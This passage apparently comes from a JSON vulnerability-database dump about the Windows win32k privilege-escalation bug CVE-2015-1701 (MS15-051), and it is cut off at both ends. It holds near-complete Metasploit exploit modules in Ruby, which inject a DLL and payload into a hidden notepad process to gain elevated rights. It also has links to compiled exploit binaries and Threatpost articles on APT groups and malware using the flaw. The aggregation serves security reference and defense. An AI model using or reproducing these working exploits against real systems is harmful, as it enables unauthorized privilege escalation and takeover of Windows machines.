library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n\r\n print_status(\"Exploit injected. 
Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23783"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - Local Privilege Escalation (MS15-051)", "edition": 1, "published": "2015-05-18T00:00:00", "title": "Microsoft Windows - Local Privilege Escalation (MS15-051)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-05-18T00:00:00", "id": "EXPLOITPACK:0C7BFC055EDD13EA35CAEAEBD1DF65A3", "href": "", "sourceData": "# Source: https://github.com/hfiref0x/CVE-2015-1701\n\nWin32k LPE vulnerability used in APT attack\n\nOriginal info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html\n\nCredits\nR136a1 / hfiref0x\n\n\n\n## Compiled EXE:\n### x86\n+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe\n+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-32.exe\n### x64 \n+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe\n+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe\n\n## Source Code: \n+ https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip\n+ EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-src.zip", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-14T22:31:47", "description": "This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.\n", "published": "2015-06-03T11:48:23", "type": "metasploit", "title": "Windows ClientCopyImage Win32k Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS15_051_CLIENT_COPY_IMAGE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\n 'Description' => %q{\n This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Unknown', # vulnerability discovery and exploit in the wild\n 'hfirefox', # Code released on github\n 'OJ Reeves', # msf module\n 'Spencer McIntyre' # msf module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' => [\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' => [\n ['CVE', '2015-1701'],\n ['MSB', 'MS15-051'],\n 
['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\n ],\n 'DisclosureDate' => '2015-05-12',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n },\n }))\n end\n\n def check\n # Windows XP SP3 (32-bit) 5.1.2600.6514 (Works)\n # Windows Server 2003 Standard SP2 (32-bit) 5.2.3790.5445 (Works)\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\n # Windows 7 SP1 (64-bit) 6.1.7601.17514 (Works)\n # Windows 7 SP1 (64-bit) 6.1.7601.17535 (Works)\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\n # Windows 7 SP1 (32-bit) 6.1.7601.18388 (Works)\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.18105 (Works)\n\n if sysinfo['OS'] !~ /windows/i\n return Exploit::CheckCode::Unknown\n end\n\n if sysinfo['Architecture'] =~ /(wow|x)64/i\n arch = ARCH_X64\n elsif sysinfo['Architecture'] =~ /x86/i\n arch = ARCH_X86\n end\n\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n return Exploit::CheckCode::Safe if build > 7601\n\n return Exploit::CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n check_result = check\n if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\n end\n\n if sysinfo['Architecture'] == ARCH_X64\n if session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n end\n\n if target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is 
specified as x86')\n end\n elsif target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n if target.arch.first == ARCH_X86\n dll_file_name = 'cve-2015-1701.x86.dll'\n else\n dll_file_name = 'cve-2015-1701.x64.dll'\n end\n\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. 
Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms15_051_client_copy_image.rb"}], "exploitdb": [{"lastseen": "2016-02-04T05:40:47", "description": "Windows ClientCopyImage Win32k Exploit. CVE-2015-1701. Local exploit for windows platform", "published": "2015-06-24T00:00:00", "type": "exploitdb", "title": "Windows ClientCopyImage Win32k Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-06-24T00:00:00", "id": "EDB-ID:37367", "href": "https://www.exploit-db.com/exploits/37367/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\r\n 'Description' => %q{\r\n This module exploits improper object handling in the win32k.sys kernel mode driver.\r\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\r\n Windows 2008 R2 SP1 x64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # vulnerability discovery and exploit in the wild\r\n 'hfirefox', # Code released on github\r\n 'OJ Reeves' # msf module\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64 ],\r\n 'Platform' => 'win',\r\n 
'SessionTypes' => [ 'metrepreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' => [\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]\r\n ],\r\n 'Payload' => {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'References' => [\r\n ['CVE', '2015-1701'],\r\n ['MSB', 'MS15-051'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\r\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\r\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\r\n ],\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def check\r\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\r\n # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\r\n\r\n if sysinfo['OS'] !~ /windows/i\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /(wow|x)64/i\r\n arch = ARCH_X86_64\r\n elsif sysinfo['Architecture'] =~ /x86/i\r\n arch = ARCH_X86\r\n end\r\n\r\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\r\n major, minor, build, revision, branch = file_version(file_path)\r\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\r\n\r\n return Exploit::CheckCode::Safe if build == 7601\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /wow64/i\r\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\r\n elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first 
== ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Metrepreter::RequestError\r\n # Reader Sandbox won't allow to create a new process:\r\n # stdapi_sys_process_execute: Operation failed: Access is denied.\r\n print_status('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n if target.arch.first == ARCH_X86\r\n dll_file_name = 'cve-2015-1701.x86.dll'\r\n else\r\n dll_file_name = 'cve-2015-1701.x64.dll'\r\n end\r\n\r\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. 
Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\n\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37367/"}], "threatpost": [{"lastseen": "2018-10-06T22:55:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2015-2545"], "description": "A Microsoft Office vulnerability [patched six months ago](<https://threatpost.com/microsoft-patches-graphics-component-flaw-under-attack/114575/>) continues to be a valuable tool for APT gangs operating primarily in Southeast Asia and the Far East.\n\nResearchers at Kaspersky Lab today published a [report](<https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/>) describing how attackers continue to flourish exploiting [CVE-2015-2545](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2545>), a remote code execution vulnerability where an attacker crafts an EPS image file embedded in an Office document designed to bypass memory protections on Windows systems.\n\nExploits have been used primarily to gain an initial foothold on targeted systems. Those targets are largely government and diplomatic agencies and individuals in India and Asia, as well as satellite offices of those agencies in Europe and elsewhere.\n\nThe Office flaw was patched in September in [MS15-099](<https://technet.microsoft.com/library/security/ms15-099>) and updated again in November. Yet APT groups seem to be capitalizing on lax patching inside these high-profile organizations to carry out espionage. 
Some criminal organizations have also made use of exploits against this particular flaw, in particular against financial organizations in Asia, Kaspersky researchers said in their report.\n\nThe APT groups, however, seem to be having the most ongoing success with CVE-2015-2545. Kaspersky Lab identified a half-dozen groups, including two new outfits, that have been using modified exploits for the flaw.\n\nThe new players are known as Danti and SVCMONDR. Danti is a relative newcomer operating since 2015 and primarily against Indian government organizations. It has recently branched out against targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines, Kaspersky said.\n\nIn February and March, researchers saw Danti attacks moving via spear-phishing emails laced with a .docx file that exploits the Microsoft flaw and drops custom shellcode on compromised machines.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235523/danti_timeline.png>)\n\n\u201cThe exploit is based on a malformed embedded EPS (Encapsulated Postscript) object,\u201d Kaspersky researchers wrote in their report. \u201cThis contains the shellcode that drops a backdoor, providing full access to the attackers.\u201d\n\nThe February attacks were concentrated against the Indian Ministry of External Affairs starting Feb. 2 and concluding Feb. 29, the report says. Indian embassies in Hungary, Denmark and Colombia were also targeted.\n\nThe emails contained relevant subject lines to the targets and spoofed legitimate email addresses belonging to high-ranking officials, including the IT director of India\u2019s Ministry of Communications and Information Technology.\n\nIn March, the Danti group struck again, in particular against a number of people inside the Cabinet Secretariat of Government India from an email spoofing a high-ranking government official. 
A modified version of previous EPS exploits dropped a backdoor and other capabilities that monitored system information and gave the attackers the ability to modify files, execute commands, terminate processes and gain a shell.\n\nSVCMONDR used spear-phishing messages to hit targets in Taiwan with exploits that hint at a connection to the Danti group as well as APT 16, which is thought to be a separate APT gang. However, its emails came from the same domain as the SVCMONDR attackers, using different shellcode and dropping a new backdoor.\n\nThe EPS exploits drop a program called SVCMONDR.exe that embeds itself in the registry for persistence and that establishes a backdoor through which commands and stolen files are sent.\n\nKaspersky\u2019s report also implicates the [Platinum APT group](<https://threatpost.com/platinum-apt-group-abuses-windows-hotpatching/117692/>) as the first to exploit CVE-2015-2545. Platinum was identified by Microsoft; it used EPS exploits against targets in India as early as last August. A recent Microsoft report described some of Platinum\u2019s exploits, including its ability to abuse a hotpatching feature introduced in Windows in 2003 and available until it was removed in Windows 8. The abuse of hotpatching allows the attackers to inject malicious code into running processes without having to reboot the server. Hotpatching requires admin privileges, so the attackers already have to be on the box to make use of this technique. \nKaspersky also said in addition to APT 16, which targeted news agencies in Taiwan late last year, another APT group known as EvilPost has been exploiting the EPS flaw.\n\nEvilPost used the EPS exploit to hit defense contractors in Japan; in one attack described by Kaspersky, EvilPost attackers used a maliciously crafted EPS object embedded in an Office document to run a shell on compromised machines and drop a separate DLL that exploited CVE-2015-1701, a privilege escalation vulnerability. 
With elevated permissions, the attackers were then able to backdoor systems and reach out to command servers to download more malware.\n\nThe Kaspersky report, however, said that the attackers no longer have access to a command server in Japan and theorize either it was compromised or the attackers abandoned their mission after researchers discovered it.\n\nThe remaining APT group outed by Kaspersky is called Spivy; it targeted organizations in Hong Kong and used a variant of the Poison Ivy backdoor to steal information.\n\n[Technical information and indicators of compromise](<https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/>) are available on Securelist.com.\n", "modified": "2016-05-27T16:18:13", "published": "2016-05-25T12:58:57", "id": "THREATPOST:5BEEE925F2AFCC46C5E8886ADAA43B84", "href": "https://threatpost.com/apt-groups-finding-success-with-patched-microsoft-flaw/118298/", "type": "threatpost", "title": "APT Groups Exploiting Patch Microsoft Office Flaw CVE-2015-2545", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-4113", "CVE-2015-1701"], "description": "A malware dropper with designs on specific targets was found in a private underground forum and is likely the predecessor to the Furtim malware that was uncovered in May.\n\nResearchers at SentinelOne today published a [report](<https://sentinelone.com/blogs/sfg-furtims-parent/>) that says the dropper sample they investigated, which they\u2019re calling SFG, was built to target at least one unnamed European energy company. 
The report says the dropper is likely the work of a state-sponsored group and is used as the first stage of targeted attacks.\n\nThe dropper\u2019s principal mission is to avoid detection; it will not execute if it senses it\u2019s being run in a virtualized environment such as a sandbox, and it also can bypass antivirus protection running on compromised machines.\n\nThe sample also includes a pair of privilege escalation exploits for patched Windows vulnerabilities (CVE-2014-4113 and CVE-2015-1701), as well as a bypass for Windows User Account Control (UAC), which limits user privileges.\n\n\u201cIt escalates privileges after all these checks and registers a hidden binary that it drops onto the hard drive that runs early in the boot process,\u201d SentinelOne senior security researcher Joseph Landry said. \u201cIt will go through and systematically remove any AV on the machine that it targets. Then it drops another payload to the Windows directory and runs it during login time.\u201d\n\nIn this one sample, Landry said, the dropper sets the stage for the installation of the Furtim malware. Furtim was uncovered by security company enSilo, which published a [report](<http://blog.ensilo.com/furtim-the-ultra-cautious-malware>) in May on the malware. The sample described by enSilo had three payloads: a power-saving configuration tool that disables sleep mode and hibernation on Windows machines in order to maintain command and control connections; the Pony malware, which steals credentials and sends them back to the attackers\u2019 server; and an unknown payload that sends a list of security processes running on the machine to the command and control server, even though the malware has theoretically already wiped AV off the machine before installing itself. In the case of the sample found by SentinelOne, its command and control servers are already offline and it\u2019s unknown what other payloads and commands it could handle. 
Landry said this is the first stage of a bigger attack.\n\n\u201cThis gives them a point on the network from where they can then pivot and attack other systems or do recon from,\u201d Landry said. \u201cWe\u2019re not seeing anything it\u2019s attacking, but this is where initial implant would be. They would be able to run whatever code without AV chirping.\u201d\n\nUdi Shamir, chief security officer at SentinelOne, said he\u2019s unaware of how many victims there may be.\n\n\u201cI don\u2019t have an exact numbers on the infection magnitude, but this sample was developed for more targeted attacks rather than high infection volume (still, this is an estimation),\u201d he said. \u201cThis sample seems to target large enterprise organizations, and has probably already infected a few.\u201d\n\nSince the code burrows itself in the startup much like a rootkit, Landry said it would be difficult to remove.\n\n\u201cThis is very professional, not just the techniques used to wipe AV, but the code is professional,\u201d Landry said. \u201cThe APIs here are very low level and not normally public. This was built by someone who really understands how Windows works, and how it has changed over the last few years. It\u2019s very likely a nation-state deal. 
Criminals don\u2019t need it to be this effective.\u201d\n", "modified": "2016-07-15T21:08:32", "published": "2016-07-12T09:31:54", "id": "THREATPOST:2DE43487E2CDBEABD59D64B1DC7CE12C", "href": "https://threatpost.com/malware-dropper-built-to-target-european-energy-company/119195/", "type": "threatpost", "title": "Malware Dropper Built to Target European Energy Company", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:54", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2017-11882"], "description": "Patch Tuesday as we know it may be on its last legs, but it\u2019s certainly not going quietly.\n\nA little more than a week after Microsoft announced how it would [revamp patch distribution and security updates](<https://threatpost.com/patch-tuesday-facelift-end-of-an-era/112640>) starting with Windows 10, the company today released its scheduled round of bulletins\u201413 in all, including [three critical updates](<https://technet.microsoft.com/library/security/ms15-may>) for vulnerabilities in Internet Explorer, Microsoft Font Drivers, and Windows Journal, all of which lead to remote code execution.\n\nWith Windows 10 due before the end of the summer, admins had better start thinking about revamping their patch assessment and prioritization processes if they\u2019re going to upgrade to the new version of the Windows OS. 
With Windows Update for Business, patches will be available as they\u2019re ready, and features built into the tool will allow IT managers to decide which machines are patched on quicker cycles, and which have to wait until testing is complete, for example.\n\nThat doesn\u2019t mean the vulnerability parade is likely to let up; Qualys for example, says that the pace of this year\u2019s bulletins and patches has already exceeded each of the last five years and figures to top 150 by year\u2019s end.\n\nToday\u2019s update runs the usual spectrum of products affected by the respective bulletins. The almost-habitual Internet Explorer cumulative update, [MS15-043](<https://technet.microsoft.com/library/security/MS15-043>), is likely the highest priority; it patches 22 vulnerabilities that enable not only remote code execution, but also security feature bypasses, information disclosure and elevation of privileges. For Windows clients, most of the IE bugs are rated important by Microsoft; those rated critical include 14 memory corruption vulnerabilities in IE6-11. The bulletin also takes care of a number of ASLR bypass vulnerabilities in IE or VBScript and an IE Clipboard information disclosure issue.\n\n[MS15-044](<https://technet.microsoft.com/library/security/MS15-044>) patches more TrueType font vulnerabilities, this time in Windows, .NET, Office, Lync and Silverlight, and fixes how the Windows DirectWrite library handles TrueType and OpenType fonts. TrueType font vulnerabilities have caused trouble before; in 2013, Microsoft patched a separate vulnerability that led to kernel compromises and remote code execution. Font-parsing vulnerabilities have also been part of high-profile APT-style targeted attacks, including Duqu.\n\nThe TrueType bug is the more serious of the two, and could lead to remote code execution if the respective products fail to properly handle TrueType fonts, Microsoft said. 
The OpenType bug is an information disclosure flaw and could allow an attacker to read data meant to be private; hackers could not exploit this to run code or elevate privileges, Microsoft said.\n\nThe final critical bulletin, [MS15-045](<https://technet.microsoft.com/library/security/MS15-045>), is another remote code execution issue, this time in Windows Journal, Microsoft\u2019s note-taking program, and can be exploited if a user opens a malicious Journal file. The bulletin patches six vulnerabilities; Microsoft proposes a temporary workaround of either not opening Journal files or removing the .jnt file association.\n\n\u201cThe vulnerability with Windows Journal is particularly interesting in the target scenario, where an administrator is opening a journal file to determine or diagnose a problem, and the tools we\u2019re given to manage problems are at the same time being used to penetrate the target host, and open you up for further attacks,\u201d said Jon Rudolph, principal software engineer at Core Security. \u201cThis most likely would not be aimed at the typical user, but someone with admin permissions.\u201d\n\nExperts warn that the Office bulletin [MS15-046](<https://technet.microsoft.com/library/security/MS15-046>), though rated important, should merit a second look because it enables remote code execution, as does the SharePoint bulletin, [MS15-047](<https://technet.microsoft.com/library/security/MS15-047>).\n\nThe Office and SharePoint bulletins, however, are replacements for a number of older bulletins released earlier this year. 
If admins have not yet applied the older updates, they need only apply today\u2019s.\n\nAnother bulletin rated important that deserves extra attention is [MS15-051](<https://technet.microsoft.com/library/security/MS15-051>), which patches six vulnerabilities in Windows Kernel-Mode Drivers, among them the elevation of privilege bug CVE-2015-1701, which has been publicly disclosed and which Microsoft said is already being used in limited targeted attacks. The patch addresses an issue where the kernel-mode driver improperly handles objects in memory; an attacker with local access could then run code in kernel mode.\n\nThe remaining Important bulletins are as follows:\n\n * [MS15-048](<https://technet.microsoft.com/library/security/MS15-048>): Patches elevation of privilege vulnerabilities in .NET\n * [MS15-049](<https://technet.microsoft.com/library/security/MS15-049>): Patches an elevation of privilege vulnerability in Silverlight\n * [MS15-050](<https://technet.microsoft.com/library/security/MS15-050>): Patches an elevation of privilege vulnerability in Service Control Manager\n * [MS15-052](<https://technet.microsoft.com/library/security/MS15-052>): Patches a security feature bypass in the Windows Kernel\n * [MS15-053](<https://technet.microsoft.com/library/security/MS15-053>): Patches security feature bypass vulnerabilities in the JScript and VBScript scripting engines\n * [MS15-054](<https://technet.microsoft.com/library/security/MS15-054>): Patches a denial of service vulnerability in the Microsoft Management Console file format\n * [MS15-055](<https://technet.microsoft.com/library/security/MS15-055>): Patches an information disclosure vulnerability in Schannel\n", "modified": "2015-05-12T18:49:45", "published": "2015-05-12T14:49:45", "id": "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "href": "https://threatpost.com/microsoft-patches-remote-code-execution-bugs-in-ie-font-drivers-windows-journal/112762/", "type": "threatpost", "title": "May 2015 Microsoft Patch Tuesday Security Bulletins", 
"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:02", "bulletinFamily": "info", "cvelist": ["CVE-2014-4113", "CVE-2015-1701"], "description": "New research is challenging what security researchers know about Furtim, a new malware strain that has been compared to Stuxnet because of its believed targeting of industrial controls in energy companies.\n\nAccording to security experts at Damballa, Furtim and the recently discovered SFG malware are one in the same \u2013 only varying by a few lines of code that include the HTTP header information.\n\nThe research clarifies earlier investigations that distinguished Furtim and SFG as closely related, but separate malware strains. Researcher Don Jackson, senior threat researcher at Damballa, says further analysis shows that they are the same.\n\n\u201cThe only difference between them is in the HTTP header. Those headers simply have different values and are chosen at random by the malware so that different builds of the same malware don\u2019t look the same on the network,\u201d Jackson said.\n\nJackson said [additional research into Furtim/SFG shows](<https://www.damballa.com/furtimsfg-using-existing-virtual-fast-flux-network/>) that the malware is not singling out energy plants as targets, as previously thought, but is trying to infect any network in an attempt to steal user credentials.\n\n\u201cThis malware is being distributed via a variety of different methods including drive-by downloads, malvertising and spam messages. It\u2019s extremely opportunistic and not specifically targeting one sector over another. It\u2019s just infecting Windows machines where ever it can find a way in,\u201d Jackson said.\n\nIt was previous believed that Furtim/SFG was malware was designed to specifically target the energy sector. 
On July 12, [a report by SentinelOne](<https://threatpost.com/malware-dropper-built-to-target-european-energy-company/119195/>) said a SFG dropper was targeting an unspecified European energy company. The company believed SFG was the work of a state-sponsored group that used the dropper as a first stage of a targeted attack where the Furtim malware was then downloaded.\n\nOn July 14, [SentinelOne updated its research](<https://sentinelone.com/blogs/sfg-furtims-parent/>): \u201cThere has been a number of stories published since the posting of this blog that have suggested this attack is specifically targeting SCADA energy management systems. We want to emphasize that we do not have any evidence that this is in fact the case. The focus of our analysis was on the characteristics of the malware, not the attribution or target.\u201d\n\nFurtim/SFG\u2019s principal mission was to avoid detection and execute privilege escalation exploits for patched Windows vulnerabilities (CVE-2014-4113 and CVE-2015-1701), as well as a bypass for Windows User Account Control (UAC), which limits user privileges.\n\n\u201cAs far as the number and type of tactics this malware is really state of the art. It tries almost every trick that I\u2019ve run across to stay hidden and being analyzed. It\u2019s not nation-state level, but it is extremely well put together malware,\u201d Jackson said.\n\nFurtim was uncovered by security company enSilo, which published a [report in May](<http://blog.ensilo.com/furtim-the-ultra-cautious-malware>) on the malware. 
The sample described by enSilo had three payloads: a power-saving configuration tool that disables sleep mode and hibernation on Windows machines in order to maintain command and control connections; the Pony malware, which steals credentials and sends them back to the attackers\u2019 server; and an unknown payload that sends a list of security processes running on the machine to the command and control server, even though the malware has theoretically already wiped AV off the machine before installing itself.\n\nAccording to Damballa researchers, the Furtim/SFG malware is being distributed by a fast-flux botnet that the company is calling Dark Cloud, via a Malware-as-a-Service relationship. Fast flux is a DNS technique used to hide criminal activity by routing it through an ever-changing network of compromised hosts acting as proxies.\n", "modified": "2016-07-22T19:02:00", "published": "2016-07-18T13:26:09", "id": "THREATPOST:6D624865424D6B497F552030FAE6A7EE", "href": "https://threatpost.com/researchers-crack-furtim-sfg-malware-connection/119334/", "type": "threatpost", "title": "Researchers Crack Furtim, SFG Malware Connection", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:23:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2018-8120", "CVE-2019-1458", "CVE-2020-0674"], "description": "The 